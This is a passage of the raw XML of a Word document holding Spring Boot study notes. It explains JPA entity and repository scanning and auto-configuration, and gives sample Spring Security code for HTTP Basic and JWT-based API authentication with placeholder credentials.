    <w:p w14:paraId="0B42A891"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 Boot automatically scans the project’s packages for classes annotated with @Entity and interfaces that extend JpaRepository during application startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17497C60"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ringBootApplication</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EnableJpaRepositories</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotations (or their combination) are responsible for enabling the automatic configuration of Spring Data JPA, and they instruct Spring to scan for repository interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79351D1A"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@EnableJpaRepositories</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation is usually used to enable JPA repositories if you want to customize the location or behavior of the repository scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AA716D"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ableJpaRepositories(basePackages = "com.example.repositories")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE0330" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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4. Configuration in application.properties or application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585D492A"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 Boot auto-configures JPA based on the properties defined in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCAC7F"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se properties define the database connection details, dialect, and other JPA settings like hibernate.ddl-auto and spring.jpa.properties.hibernate.dialect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00024E9F"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 configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738ECC00"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rl=jdbc:mysql://localhost:3306/your_database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48351C94"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username=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389635DA"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datasource.password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CCF19"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC1E94C"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jpa.database-platform=org.hibernate.dialect.MySQL5Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791FBBC8" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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5. Auto-Configuration in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173EA2E"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ring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides auto-configuration for JPA via @EnableAutoConfiguration (enabled by default through @SpringBootApplication), which will set up the EntityManagerFactory, DataSource, and TransactionManager beans automatically based on the properties in application.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EBD0BB" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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Process Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB396F5"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ntity classes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@Entity) are scanned by Spring Boot during the application startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B32CF7"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Repository interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> extending JpaRepository are recognized by Spring Data JPA as the mechanism to perform CRUD operations on entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD0D23B"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JpaRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is automatically implemented at runtime by Spring Data JPA, which allows you to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291DD463"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ring Boot’s auto-configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets up the necessary beans like EntityManagerFactory and DataSource based on the configuration in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869A138"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hen you invoke methods on the repository (employeeRepository.findById(id)), Spring Data JPA generates SQL queries and interacts with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075AD796" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8E"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D3AE2"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ntity</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation makes a class known to JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D98BC14"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JpaRepository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface provides the mechanism to interact with that entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17742C27"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 Boot automatically configures and scans for entities and repositories during startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE8266" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8E"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JPA repositories are auto-implemented, and Spring Data JPA handles query generation based on method names or custom queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFC694D" w14:textId="78485179" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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34063FB">
          <v:rect id="_x0000_i2739" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="436933A4" w14:textId="34AB852D" w:rsidR="009653FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009572AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="662" w:name="_Toc196308142"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How will you authenticate API in Spring Boot</w:t>
      </w:r>
      <w:r w:rsidR="009653FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="662"/>
    </w:p>
    <w:p w14:paraId="3C6F462B" w14:textId="6B84B321" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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o authenticate APIs in a Spring Boot application, you can implement authentication using several methods. Here are the common ways to authenticate APIs in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E3B3D8" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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Basic Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21771F3E"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Basic Authentication involves sending a username and password with each request. It's simple but not very secure without HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F642B8" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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teps to Implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A8BB3"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dd Spring Security dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your pom.xml or build.gradle file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E1970"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e HTTP Basic authentication in your Spring Security configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A29522"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 configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65402313"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E750E"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ableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D7C2B"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38014E8B" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252F0AEE"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C31D89"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1050D8C7"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08991321"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horizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F7B61"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tMatchers("/api/**").authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAD2063"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C06264"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httpBasic(); // Enable basic authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278B4383"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24A9C060" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F45D6CD"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E4B97"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otected void configure(AuthenticationManagerBuilder auth) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B6C6E2"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h.inMemoryAuthentication()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F89C92"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ithUser("user").password(passwordEncoder().encode("password")).roles("USER");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B9063"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57FF0FD6" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0F77D4"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F750038"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PasswordEncoder passwordEncoder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06963618"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BCryptPasswordEncoder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA5F0B6"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8106696"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83C549E"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ith the above configuration, any request to /api/** endpoints will require basic authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D872037"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credentials are provided as Authorization: Basic base64(username:password) in the request header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBD09E" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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JWT Authentication (JSON Web Token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF3A4E"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JWT is a widely used token-based authentication mechanism. It allows you to authenticate once and then use the token for subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355C9462" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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teps to Implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB54978"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dd Spring Security and JWT dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D06094"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reate a filter for JWT authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915DB64"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e JWT tokens for subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168E6C10"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 configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D46864"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JWT Utility Class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (responsible for creating and parsing tokens):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5C894"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDCA02C"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JwtTokenUtil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9799E" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72BBA718"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String secretKey = "mySecretKey"; // You can store this in application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240637EF" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9C9B2D"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Method to generate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF9CE8A"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ring generateToken(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597538A8"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Jwts.builder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010B6B8A"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etSubject(username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E292CD4"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etIssuedAt(new Date())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA9947C"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 xml:space="preserve">                .setExpiration(new Date(System.currentTimeMillis() + 1000 * 60 * 60)) // Token validity: 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B24BBA"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ignWith(SignatureAlgorithm.HS256, secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FE561"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compact();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DF86AB"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213E0C17" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64628A25"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Method to validate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AABB2"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boolean validateToken(String token, String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3879A7FA"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tring parsedUsername = extractUsername(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DF345"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parsedUsername.equals(username) &amp;&amp; !isTokenExpired(token));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA628D"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5C0395CF" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10971732"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tring extractUsername(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F618959"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Jwts.parser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDEC6F1"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etSigningKey(secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C82DA74"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arseClaimsJws(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630351E1"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tBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1169185B"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tSubject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D818F4"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0841FD78" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A59A3E"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boolean isTokenExpired(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B1875"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extractExpiration(token).before(new Date());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C863BD5"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44B259FB" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0932D8EA"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Date extractExpiration(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB83D9B"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Jwts.parser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2050C7"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etSigningKey(secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7CAAB"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arseClaimsJws(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6DD03"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tBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74497C3A"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getExpiration();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422FA97E"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39861A52"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68AC8391"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JWT Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (responsible for intercepting requests to check for a valid token):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D405254"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JwtRequestFilter extends OncePerRequestFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A335A2" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4D6EE0"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JwtTokenUtil jwtTokenUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A37E36" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2DBAC0"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48624F7C"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UserDetailsService userDetailsService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E902C13" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF7C18C"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JwtRequestFilter(JwtTokenUtil jwtTokenUtil) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC90062"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his.jwtTokenUtil = jwtTokenUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C20986D"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49846BEF" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782D7D99"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04384541"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otected void doFilterInternal(HttpServletRequest request, HttpServletResponse response, FilterChain filterChain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC58D06"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hrows ServletException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC02B26"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tring token = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D440FF8"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tring username = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47257BA7" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0405985A"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if (token != null &amp;&amp; token.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B270A3"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oken = token.substring(7); // Remove "Bearer " prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0998030C"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username = jwtTokenUtil.extractUsername(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B99111"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14FF0B60" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17641F52"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if (username != null &amp;&amp; SecurityContextHolder.getContext().getAuthentication() == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77123E2A"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 xml:space="preserve">            UserDetails userDetails = userDetailsService.loadUserByUsername(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7C600" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A3A17B"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if (jwtTokenUtil.validateToken(token, username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377696FE"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UsernamePasswordAuthenticationToken authentication =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B67A9"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new UsernamePasswordAuthenticationToken(userDetails, null, userDetails.getAuthorities());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14B2FC"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ecurityContextHolder.getContext().setAuthentication(authentication);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23394D"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215A0AF4"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1662ED2A" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
